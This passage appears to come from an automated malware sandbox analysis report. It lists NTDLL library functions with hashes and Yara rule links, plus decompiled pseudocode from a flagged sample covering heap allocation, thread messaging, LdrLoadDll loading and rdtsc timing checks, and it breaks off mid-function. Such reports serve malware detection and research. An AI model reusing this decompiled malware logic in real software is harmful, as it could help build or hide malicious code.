                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 71%
                                                              			E00409A90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B810( &_v284, 0x104);
						E0041BE80( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_push( &_v840);
						_push( &_v24);
						_t33 = E004080C0();
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                              0x00409a9b
                                                              0x00409aa3
                                                              0x00409aa5
                                                              0x00409aaa
                                                              0x00409aaf
                                                              0x00409ac2
                                                              0x00409ac7
                                                              0x00409ad0
                                                              0x00409adc
                                                              0x00409aef
                                                              0x00409af4
                                                              0x00409af7
                                                              0x00409b00
                                                              0x00409b12
                                                              0x00409b17
                                                              0x00409b1c
                                                              0x00000000
                                                              0x00000000
                                                              0x00409b1e
                                                              0x00409b22
                                                              0x00000000
                                                              0x00000000
                                                              0x00409b24
                                                              0x00000000
                                                              0x00409b22
                                                              0x00409b26
                                                              0x00409b29
                                                              0x00409b2f
                                                              0x00409b31
                                                              0x00409b37
                                                              0x00409b3b
                                                              0x00409b3c
                                                              0x00409b41
                                                              0x00409b44
                                                              0x00409b51
                                                              0x00409b5c
                                                              0x00409b5e
                                                              0x00409b64
                                                              0x00409b68
                                                              0x00409b6b
                                                              0x00409b6b
                                                              0x00409b72
                                                              0x00409b75
                                                              0x00409b7a
                                                              0x00409b87
                                                              0x00409ab6
                                                              0x00409ab6
                                                              0x00409ab6

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                              • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                              • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                              • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A06C, Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 24%
                                                              			E0041A06C(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, char _a3, void* _a8, void* _a12, long _a16, long _a20) {
				signed int _v117;
				void* _t21;
				void* _t28;

				if(__eflags > 0) {
					 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
					E0041A960(_t28);
					_t21 = RtlAllocateHeap(_a12, _a16, _a20); // executed
					return _t21;
				} else {
					__eflags = _v117 & __dl;
					__ebp = __esp;
					__eax = _a3;
					 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __cl;
					__eax = __eax ^ 0x8d51006a;
					_t12 = __esi + 0x50;
					 *_t12 =  *(__esi + 0x50) + __dl;
					__eflags =  *_t12;
					__eax = E0041A960(__edi);
					__edx = _a16;
					__eax = _a12;
					__esp = __esp + 0x14;
					__edx =  *__esi;
					__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
					__esi = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}






                                                              0x0041a06d
                                                              0x0041a044
                                                              0x0041a047
                                                              0x0041a05d
                                                              0x0041a061
                                                              0x0041a06f
                                                              0x0041a06f
                                                              0x0041a071
                                                              0x0041a073
                                                              0x0041a075
                                                              0x0041a07b
                                                              0x0041a084
                                                              0x0041a084
                                                              0x0041a084
                                                              0x0041a087
                                                              0x0041a08c
                                                              0x0041a08f
                                                              0x0041a095
                                                              0x0041a099
                                                              0x0041a09d
                                                              0x0041a09f
                                                              0x0041a0a0
                                                              0x0041a0a1
                                                              0x0041a0a1

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                              • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocateFree
                                                              • String ID:
                                                              • API String ID: 2488874121-0
                                                              • Opcode ID: d49a432cdd5c01aa9f191f6ec0a8badd1e212295b94700a6f4918083b9473e23
                                                              • Instruction ID: fc7eb897deeb00fa9fc59cbe7b07ea65bbf3bef7872b379aa26a42e6280a7679
                                                              • Opcode Fuzzy Hash: d49a432cdd5c01aa9f191f6ec0a8badd1e212295b94700a6f4918083b9473e23
                                                              • Instruction Fuzzy Hash: F4F0A9B52006086FDB14EF69DC81EEB77A8EF88314F05864AFC4D97342C231E8648AB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: ffff0ec11c1eb3a736fa2ec4c3761c568382b3885d6e56e922daa291e323ade2
                                                              • Instruction ID: 9e320ba3d4fac806ce6d12dede2997aeb61cccecc0dd5674e9b2c28e569bb91b
                                                              • Opcode Fuzzy Hash: ffff0ec11c1eb3a736fa2ec4c3761c568382b3885d6e56e922daa291e323ade2
                                                              • Instruction Fuzzy Hash: 0D01B931A403287BE720A6959C43FFE776CAB40F54F04402DFF44BA1C1D6E8691546EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                              • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                              • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                              • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00408373, Relevance: 1.5, APIs: 1, Instructions: 40threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 9477ba1bb142808349c2f710c55e66a26820e5a071a547b8227db34a9b1d6367
                                                              • Instruction ID: 1a019ac7044e24f2453a2ee76f51b75c9e329abfa2cbee8170f80e9bc9ae5517
                                                              • Opcode Fuzzy Hash: 9477ba1bb142808349c2f710c55e66a26820e5a071a547b8227db34a9b1d6367
                                                              • Instruction Fuzzy Hash: 6AF02731B8021836F62011682D03FBE6608AB81F11F18406EFF40F91C1E9EA281506E9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040ACC3, Relevance: 1.5, APIs: 1, Instructions: 38libraryloaderCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 87%
                                                              			E0040ACC3(struct _OBJDIR_INFORMATION __eax, void* __ecx, void* _a8) {
				void* _v4;
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				void* _v536;

				_t14 = __eax;
				asm("ror byte [ebp+0x67101d03], cl");
				if(__ecx + __eax != 0) {
					_v12 = _t14;
					if(_t14 == 0) {
						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
						_t14 = _v12;
					}
					return _t14;
				} else {
					_t14 = __eax + 0x75;
					if (_t14 != 0) goto L8;
				}
			}







                                                              0x0040acc3
                                                              0x0040acc3
                                                              0x0040accb
                                                              0x0040ad29
                                                              0x0040ad2e
                                                              0x0040ad42
                                                              0x0040ad44
                                                              0x0040ad44
                                                              0x0040ad4a
                                                              0x0040accd
                                                              0x0040accd
                                                              0x0040accf
                                                              0x0040acd0

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: a73f0cf4039e4e4d7422ced56ceddb19bc0f52a88321b0cf743dfebf3b8f62ea
                                                              • Instruction ID: 83ea191ed50d742ed2a54fc7394478f22119ad3cf138c1f05ac6a17724d099b9
                                                              • Opcode Fuzzy Hash: a73f0cf4039e4e4d7422ced56ceddb19bc0f52a88321b0cf743dfebf3b8f62ea
                                                              • Instruction Fuzzy Hash: ABF0317194020DABDF10DA94D842BD9B7789B14308F0081A6ED0C9B681F634DA598B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A062, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: e6bd70a87da6d4e194ee8766a454b47093608baa01048bdc43d93ec0938b867c
                                                              • Instruction ID: 1c47804c92bc226a8a663a76afd40eeafeee3dc63b2ab12032da961bbb6f6a39
                                                              • Opcode Fuzzy Hash: e6bd70a87da6d4e194ee8766a454b47093608baa01048bdc43d93ec0938b867c
                                                              • Instruction Fuzzy Hash: 3FE026B81052852BDB00EE69DCC08EB7B90BF827247149A0AF85847363C235E46A87B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 30%
                                                              			E0041A070(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
				char _t15;
				void* _t22;

				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
				E0041A960(_t22);
